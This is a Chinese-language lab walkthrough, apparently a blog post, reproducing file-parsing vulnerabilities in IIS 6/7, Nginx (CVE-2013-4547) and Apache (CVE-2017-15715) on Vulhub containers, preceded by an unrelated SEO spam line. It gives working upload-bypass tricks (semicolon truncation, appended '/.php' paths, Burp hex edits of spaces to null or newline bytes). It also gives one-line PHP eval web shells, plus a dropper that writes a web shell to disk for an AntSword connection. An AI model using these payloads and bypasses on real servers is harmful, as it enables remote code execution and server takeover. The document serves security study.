專門做金融培訓(xùn)的網(wǎng)站有哪些臨沂seo排名外包
一.IIS解析漏洞復(fù)現(xiàn)
1.IIS6.X
方式一:目錄解析
搭建IIS環(huán)境
在網(wǎng)站下建立文件夾的名字為.asp/.asa 的文件夾,其目錄內(nèi)的任何擴(kuò)展名的文件都被IIS當(dāng)作asp文件來(lái)解析并執(zhí)行。
?
訪問(wèn)成功被解析
方式一:目錄解析
在IIS 6處理文件解析時(shí),分號(hào)可以起到截?cái)嗟男Ч?。也就是說(shuō) shel.asp;.jpg會(huì)被服務(wù)器看成是shell.asp。另外IIS6.0默認(rèn)的可執(zhí)行文件除了asp還包含 asa\cer\cdx
創(chuàng)建一個(gè)文件1.asp;.jpg
寫入以下內(nèi)容
訪問(wèn),成功被解析
2.IIS7.X
在I1S7.0和I1S7.5版本下也存在解析漏洞,在默認(rèn)Fast-CGI開啟狀況下,在一個(gè)文件路徑/xx.jpg后面加上/xx.php會(huì)將/xx.jpg/xx.php 解析為 php 文件。
首先安裝phpStudyIIS版
再安裝對(duì)應(yīng)的Windows服務(wù),啟動(dòng)phpStudy
打開IIS管理器,做如下操作,點(diǎn)擊確定
找到php的配置文件將下面內(nèi)容取消注釋,重啟phpStudy
在網(wǎng)站的根目錄下創(chuàng)建一個(gè)1.jpg寫入以下內(nèi)容<?php phpinfo(); ?>,在路徑后加上/.php訪問(wèn),php代碼被成功解析
二.Nginx解析漏洞復(fù)現(xiàn)
創(chuàng)建環(huán)境
安裝docker:all docker.io
安裝docker-compose:apt install docker-compose
拉取靶場(chǎng)鏡像:git clone https://github.com/vulhub/vulhub.git
進(jìn)入以下Vulhub路徑并開啟容器
cd /nginx/nginx_parsing_vulnerability
docker-compose build
docker-compose up -d
docker ps -a
1.nginx_parsing
這個(gè)解析漏洞其實(shí)是PHP CGI的漏洞,在PHP的配置文件中有一個(gè)關(guān)鍵的選項(xiàng)cgi.fix_pathinfo默認(rèn)是開啟的,當(dāng)URL中有不存在的文件,PHP就會(huì)向前遞歸解析。在一個(gè)文件/xx.jpg后面加上/.php會(huì)將/xx.jpg/xx.php 解析為 php 文件。
上傳一個(gè)jpg文件寫入以下代碼GIF89a
<?php phpinfo(); ?>,上傳
上傳成功
在路徑后面加入/.php訪問(wèn),成功解析到文件里的php代碼
2.CVE-2013-4547
上傳文件,文件里寫入<?php fputs(fopen('xnq.php','w'),'<?php @eval($_POST["cmd"])?>');?>
Bp開啟抓包,提交查詢
點(diǎn)擊Hex,找到剛剛的兩個(gè)空格,修改第二個(gè)20為00,放行
上傳成功
在.php和.jpg中間輸入兩個(gè)空格,訪問(wèn)抓包
點(diǎn)擊Hex,找到第修改的二個(gè)空格修改20為00,放行
訪問(wèn)成功,代碼被成功執(zhí)行
再訪問(wèn)一下我們的寫入的木馬文件,成功訪問(wèn),說(shuō)明寫入成功
用中國(guó)蟻劍鏈接,連接成功
三.Apache解析漏洞復(fù)現(xiàn)
1.apache_parsing
上傳一個(gè)后綴名是.php.jpg的文件里面寫入<?php phpinfo(); ?>
上傳成功
訪問(wèn)上傳的文件,php代碼被成功解析
2.CVE-2017-15715
上傳文件,文件里寫入一句話木馬<?php @eval($_POST['cmd']); ?>
Bp開啟抓包,提交查詢
點(diǎn)擊Hex,修改20為0a,放行
訪問(wèn)文件名+%0a,訪問(wèn)成功
用中國(guó)蟻劍鏈接,連接成功